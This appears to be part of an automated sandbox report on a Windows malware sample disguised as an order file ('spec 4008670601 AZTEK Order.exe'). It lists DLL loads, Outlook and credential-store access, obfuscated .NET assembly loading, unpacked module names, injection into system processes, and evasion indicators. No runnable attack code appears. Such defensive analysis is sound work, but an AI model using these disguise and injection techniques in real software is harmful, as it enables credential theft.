            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: slc.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: version.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\compact.exe, Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe, Section loaded: wininet.dll
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe, Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe, Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe, Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe, Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe, Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder, Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\compact.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: spec 4008670601 AZTEK Order.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: spec 4008670601 AZTEK Order.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: spec 4008670601 AZTEK Order.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: compact.pdbGCTL source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001238000.00000004.00000020.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000002.4559414120.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OFEkXEMCZC.exe, 0000000A.00000000.2448002882.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp, OFEkXEMCZC.exe, 0000000E.00000000.2595889432.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2528050856.0000000003528000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2525747236.0000000003377000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: QgGC.pdbSHA256 source: spec 4008670601 AZTEK Order.exe
            Source: Binary string: wntdll.pdb source: spec 4008670601 AZTEK Order.exe, spec 4008670601 AZTEK Order.exe, 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, compact.exe, compact.exe, 0000000C.00000003.2528050856.0000000003528000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2525747236.0000000003377000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: compact.pdb source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001238000.00000004.00000020.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000002.4559414120.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: QgGC.pdb source: spec 4008670601 AZTEK Order.exe

            Data Obfuscation

            Source: spec 4008670601 AZTEK Order.exe, mainscreen.cs, .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.spec 4008670601 AZTEK Order.exe.6eb0000.4.raw.unpack, -Module-.cs, .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.spec 4008670601 AZTEK Order.exe.6eb0000.4.raw.unpack, PingPong.cs, .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, R4SdoCfVfKm2ysGWeT.cs, .Net Code: ReEpk3am4R System.Reflection.Assembly.Load(byte[])
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, R4SdoCfVfKm2ysGWeT.cs, .Net Code: ReEpk3am4R System.Reflection.Assembly.Load(byte[])
            Source: 0.2.spec 4008670601 AZTEK Order.exe.288c328.0.raw.unpack, -Module-.cs, .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.spec 4008670601 AZTEK Order.exe.288c328.0.raw.unpack, PingPong.cs, .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, R4SdoCfVfKm2ysGWeT.cs, .Net Code: ReEpk3am4R System.Reflection.Assembly.Load(byte[])
            Source: 12.2.compact.exe.3d9cd08.2.raw.unpack, mainscreen.cs, .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 14.2.OFEkXEMCZC.exe.2c8cd08.1.raw.unpack, mainscreen.cs, .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 14.0.OFEkXEMCZC.exe.2c8cd08.1.raw.unpack, mainscreen.cs, .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 15.2.firefox.exe.26bbcd08.0.raw.unpack, mainscreen.cs, .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: spec 4008670601 AZTEK Order.exe, Static PE information: 0xDC4DDEC0 [Fri Feb 14 19:53:36 2087 UTC]
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 0_2_06DA6547 push ds; iretd 0_2_06DA654F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 0_2_06DA3AD7 push ebx; retf 0_2_06DA3ADA
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_00402061 push es; iretd 6_2_00402076
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_0040C158 push ecx; retf 6_2_0040C159
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_004021D9 push 77CEFDB6h; ret 6_2_004021E0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_00417238 push ebx; retf 6_2_00417239
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_00411AA5 push esp; iretd 6_2_00411AAB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_00411AB9 push 1CFC06C9h; ret 6_2_00411ABE
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_00408300 push es; retf 6_2_0040831F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_004033A0 push eax; ret 6_2_004033A2
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_0040BC07 push ss; ret 6_2_0040BC09
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_004164C3 push ebp; retf 18B7h 6_2_00416449
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_0040750F push ebp; retf 6_2_00407510
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_004125BB push esp; ret 6_2_004125CC
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_00418F6C push cs; iretd 6_2_00418F71
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_00413FE4 push 00000030h; iretd 6_2_00413FE9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, Code function: 6_2_017A09AD push ecx; mov dword ptr [esp], ecx 6_2_017A09B6
            Source: C:\Windows\SysWOW64\compact.exe, Code function: 12_2_036D225F pushad ; ret 12_2_036D27F9
            Source: C:\Windows\SysWOW64\compact.exe, Code function: 12_2_036D27FA pushad ; ret 12_2_036D27F9
            Source: C:\Windows\SysWOW64\compact.exe, Code function: 12_2_037009AD push ecx; mov dword ptr [esp], ecx 12_2_037009B6
            Source: C:\Windows\SysWOW64\compact.exe, Code function: 12_2_036D283D push eax; iretd 12_2_036D2858
            Source: C:\Windows\SysWOW64\compact.exe, Code function: 12_2_02DD3120 push ebp; retf 18B7h 12_2_02DD30A6
            Source: C:\Windows\SysWOW64\compact.exe, Code function: 12_2_02DC416C push ebp; retf 12_2_02DC416D
            Source: C:\Windows\SysWOW64\compact.exe, Code function: 12_2_02DCE716 push 1CFC06C9h; ret 12_2_02DCE71B
            Source: C:\Windows\SysWOW64\compact.exe, Code function: 12_2_02DCE702 push esp; iretd 12_2_02DCE708
            Source: C:\Windows\SysWOW64\compact.exe, Code function: 12_2_02DCE400 push esi; iretd 12_2_02DCE407
            Source: C:\Windows\SysWOW64\compact.exe, Code function: 12_2_02DC8864 push ss; ret 12_2_02DC8866
            Source: C:\Windows\SysWOW64\compact.exe, Code function: 12_2_02DC4F5D push es; retf 12_2_02DC4F7C
            Source: C:\Windows\SysWOW64\compact.exe, Code function: 12_2_02DD0C41 push 00000030h; iretd 12_2_02DD0C46
            Source: C:\Windows\SysWOW64\compact.exe, Code function: 12_2_02DC8DB5 push ecx; retf 12_2_02DC8DB6
            Source: C:\Windows\SysWOW64\compact.exe, Code function: 12_2_02DE2D10 pushfd ; retf 12_2_02DE2D88
            Source: spec 4008670601 AZTEK Order.exe, Static PE information: section name: .text entropy: 7.978470618395233
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, High entropy of concatenated method names
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, QM8C5hZiKlLbJdDmtr.csHigh entropy of concatenated method names: 'RlcqU2f37u', 'cXLqKYJdwS', 'Fr7qRCTA5j', 'EZbRw8VO6M', 'ICRRzIsa5l', 'F1bqIoMBmb', 'LshqPVDfj7', 'W9oq1gN2Sr', 'QwCqt25MK6', 'm3fqpag7y3'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, BSsJEhcGdlS5HkGCDT.csHigh entropy of concatenated method names: 'lONillSj2l', 'j01isx4a9G', 'tnoiYXDeuF', 'XnZiA97QnA', 'sV3iOylteT', 'EgUi6tCbkb', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, dB7d8mFu5eUU8getxb.csHigh entropy of concatenated method names: 'Tcu3GYEDkC', 'bG83bWvdmX', 'VIHKY4EQp0', 'G6gKAaPYBJ', 'WrHK6oclEa', 'JJIK8COS25', 'aYQKZ1iAqV', 'LAOKuUOTst', 'GewK7XJ3bR', 'eA5Kyk5hZV'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, Jhfxhhw7tJ6PfM1FNn.csHigh entropy of concatenated method names: 'iIANPlssTI', 'HSENtVjiQ7', 'yMENpUt7KJ', 'UWPNU3V7xl', 'WRrNJlD5NZ', 'qOfN3jWWDe', 'ewfNRNbvXO', 'GDSi2cdQgJ', 'dXZiEKpoey', 'lncic0yNnP'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, LMx5uOpTP1v1ft95hN.csHigh entropy of concatenated method names: 'weZPqhKXYD', 'VrCPfC31IY', 'my7PrRm4lP', 'pbFPXttB7d', 'netPBxbkgF', 'mk5PvnN0ba', 'drT0eWmXUAGwcTO4Ke', 'etuNcYTpLcZdhdIFSO', 'UvZPP8mpuD', 'xOXPtmMpUP'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, plyn4AzrwpREROgjZj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'desNg4WXyt', 'fQ1NBiPAkp', 'KCENvrmL82', 'AHGNmlqbTn', 'ruuNiM8eXV', 'ophNNtZ71I', 'B4lN01l2BA'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, IJHR3K72f7raiuBq1W.csHigh entropy of concatenated method names: 'QfYqhUImDQ', 'xwVqesdrdf', 'IY8qkc2h1P', 'iyWqdpc3hZ', 'asPqGZnpk2', 'C26qHxpaH4', 'HwpqbG3oqH', 'smuqn2jKet', 'otuqTaTVbj', 'YIuqFT66hX'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, qA9RwWS5F6FWCWFdeB.csHigh entropy of concatenated method names: 'FlTmrOANRC', 'WECmX77WOl', 'ToString', 'SV4mUJYMnP', 'uxhmJl3V9R', 'YLTmKHXdT9', 'vEDm31VvQy', 'JkJmRaQDj1', 'qDLmq0jOSc', 'AlPmf2LUYj'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, LhKXYDnDrCC31IYC1l.csHigh entropy of concatenated method names: 'R4cJOAYNcS', 'YgSJWBRnUX', 'evHJx9oAe3', 'po6JSteB30', 'd2RJoyyN2q', 'Pw4JDiLgBu', 'KLiJ2UPpDc', 'nlCJEEXRVp', 'hpoJcScTW1', 'lZdJw1nbm9'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, eV9V7MD7jcQe67EKiX.csHigh entropy of concatenated method names: 'JvHmE5KpPe', 'glTmwpnVcW', 'Xs2iIQY4a7', 'VwKiPbQIQ7', 'Rs1m4iOMS7', 'e3emCoQkKu', 'y91mQMuKZ3', 'tLNmOw8VHX', 'EZomWV0A6m', 't98mxlHK31'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, ylQaofKffa4LIes7R5.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'lCc1cEwMwj', 'jJc1wnYHRm', 'qAv1zT1f33', 'APetIRtgDe', 'hBstPBbNfG', 'LwKt1Ehcvv', 'U0Uttc3pKE', 'oHlEoL6GLIiVXjYAsJ7'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, XtCPEIPI0vwmxjU1yCT.csHigh entropy of concatenated method names: 'QojNh0xZdI', 'KtSNeTgyWP', 'J1cNkmDnrc', 'IpLNdIYI4O', 'yb4NGkTU3R', 'FnDNHwboah', 'i0QNbvL49o', 'SS8NnPUZKK', 'PrfNTAtIy4', 'ovtNFuubYc'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, pdbENd1sSmsdBwH33k.csHigh entropy of concatenated method names: 'htvkcm1cW', 't9ndSAATO', 'NdqHHyi4i', 'wJabu52bW', 'fPPT19gao', 'DLVFo7bST', 'A5jUqYDi5jrufkj4C8', 'nc0XIWRIbcPoBO0RsU', 'R8hZtxpOtPGcYB5cWU', 'm9liiXFpk'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, lQu5AaJnCEQNfsoTrX.csHigh entropy of concatenated method names: 'Dispose', 'SjpPc5TKLg', 'mJR1sVmfeQ', 'zJXffgd7bH', 'rD9PwPtclR', 'dC4PzX1BqT', 'ProcessDialogKey', 'UyG1ISsJEh', 'Bdl1PS5HkG', 'PDT11Ahfxh'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, tbwg0rTy7Rm4lPvbFt.csHigh entropy of concatenated method names: 'svLKdyeQl3', 'b0nKHB1jeD', 'DhjKngmTFd', 'eHBKT4f482', 'k4CKBBPMiw', 'aQ2KvITvkX', 'y4RKmrBkDT', 'ipTKiR2VoU', 'txOKNVw479', 'Jp5K0ZUkYF'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, Dra8tFQfXTtjhUEabr.csHigh entropy of concatenated method names: 'prDgnyK5UO', 'i7QgTbg8Qj', 'RhcglyGOlM', 'fDcgsv8m9T', 'bNlgAh5rFh', 'kGOg61g2Sw', 'M5ugZHgt5t', 'yNKguR8ihO', 'tlBgyruPUK', 'RUPg41hsLF'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, zgFrk5lnN0batYPMjA.csHigh entropy of concatenated method names: 'yG1R5vUfow', 'sSDRJooOeh', 'JuoR3aQ2k4', 'xDrRqK4sfJ', 'kJlRffYJrK', 'EIK3oBi8aO', 'QXB3DUgcna', 'Yk732KGW77', 'jHo3EYVNYX', 'DDT3cS8f2P'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, R4SdoCfVfKm2ysGWeT.csHigh entropy of concatenated method names: 'Lhkt50BnTe', 'fm5tUJUIgf', 'pB7tJqeovL', 'nmttK4RPu1', 'VwAt32QsZg', 'nvRtR9CMEi', 'K4JtqiDJU0', 'N4LtfnrjPU', 'QFMtVYLYDk', 'PUetrfaAxs'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, V9PtclERpC4X1BqTDy.csHigh entropy of concatenated method names: 'zlJiUTq9mm', 'QRTiJIZijr', 'HH4iKfqR5U', 'etsi3CfVuT', 'qKdiRVihU2', 'yoAiqywsJB', 'uQRifqd9M1', 'Ds3iVwTGX4', 'MRFir7qI7x', 'yPkiXPTmkB'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, suymARO42b2OJQh7HL.csHigh entropy of concatenated method names: 'SgtByHPyMM', 'sc3BCa3DL5', 'gw1BO5mKhI', 'zc6BWw5rB2', 'K1UBsww97X', 'oapBYj08tX', 'Yi1BA313Nm', 'WpDB6lkKVc', 'Uw7B8KmsS4', 'hpVBZjTYUl'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, QM8C5hZiKlLbJdDmtr.csHigh entropy of concatenated method names: 'RlcqU2f37u', 'cXLqKYJdwS', 'Fr7qRCTA5j', 'EZbRw8VO6M', 'ICRRzIsa5l', 'F1bqIoMBmb', 'LshqPVDfj7', 'W9oq1gN2Sr', 'QwCqt25MK6', 'm3fqpag7y3'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, BSsJEhcGdlS5HkGCDT.csHigh entropy of concatenated method names: 'lONillSj2l', 'j01isx4a9G', 'tnoiYXDeuF', 'XnZiA97QnA', 'sV3iOylteT', 'EgUi6tCbkb', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, dB7d8mFu5eUU8getxb.csHigh entropy of concatenated method names: 'Tcu3GYEDkC', 'bG83bWvdmX', 'VIHKY4EQp0', 'G6gKAaPYBJ', 'WrHK6oclEa', 'JJIK8COS25', 'aYQKZ1iAqV', 'LAOKuUOTst', 'GewK7XJ3bR', 'eA5Kyk5hZV'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, Jhfxhhw7tJ6PfM1FNn.csHigh entropy of concatenated method names: 'iIANPlssTI', 'HSENtVjiQ7', 'yMENpUt7KJ', 'UWPNU3V7xl', 'WRrNJlD5NZ', 'qOfN3jWWDe', 'ewfNRNbvXO', 'GDSi2cdQgJ', 'dXZiEKpoey', 'lncic0yNnP'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, LMx5uOpTP1v1ft95hN.csHigh entropy of concatenated method names: 'weZPqhKXYD', 'VrCPfC31IY', 'my7PrRm4lP', 'pbFPXttB7d', 'netPBxbkgF', 'mk5PvnN0ba', 'drT0eWmXUAGwcTO4Ke', 'etuNcYTpLcZdhdIFSO', 'UvZPP8mpuD', 'xOXPtmMpUP'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, plyn4AzrwpREROgjZj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'desNg4WXyt', 'fQ1NBiPAkp', 'KCENvrmL82', 'AHGNmlqbTn', 'ruuNiM8eXV', 'ophNNtZ71I', 'B4lN01l2BA'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, IJHR3K72f7raiuBq1W.csHigh entropy of concatenated method names: 'QfYqhUImDQ', 'xwVqesdrdf', 'IY8qkc2h1P', 'iyWqdpc3hZ', 'asPqGZnpk2', 'C26qHxpaH4', 'HwpqbG3oqH', 'smuqn2jKet', 'otuqTaTVbj', 'YIuqFT66hX'

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\compact.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: spec 4008670601 AZTEK Order.exe PID: 1008, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFDB442D504
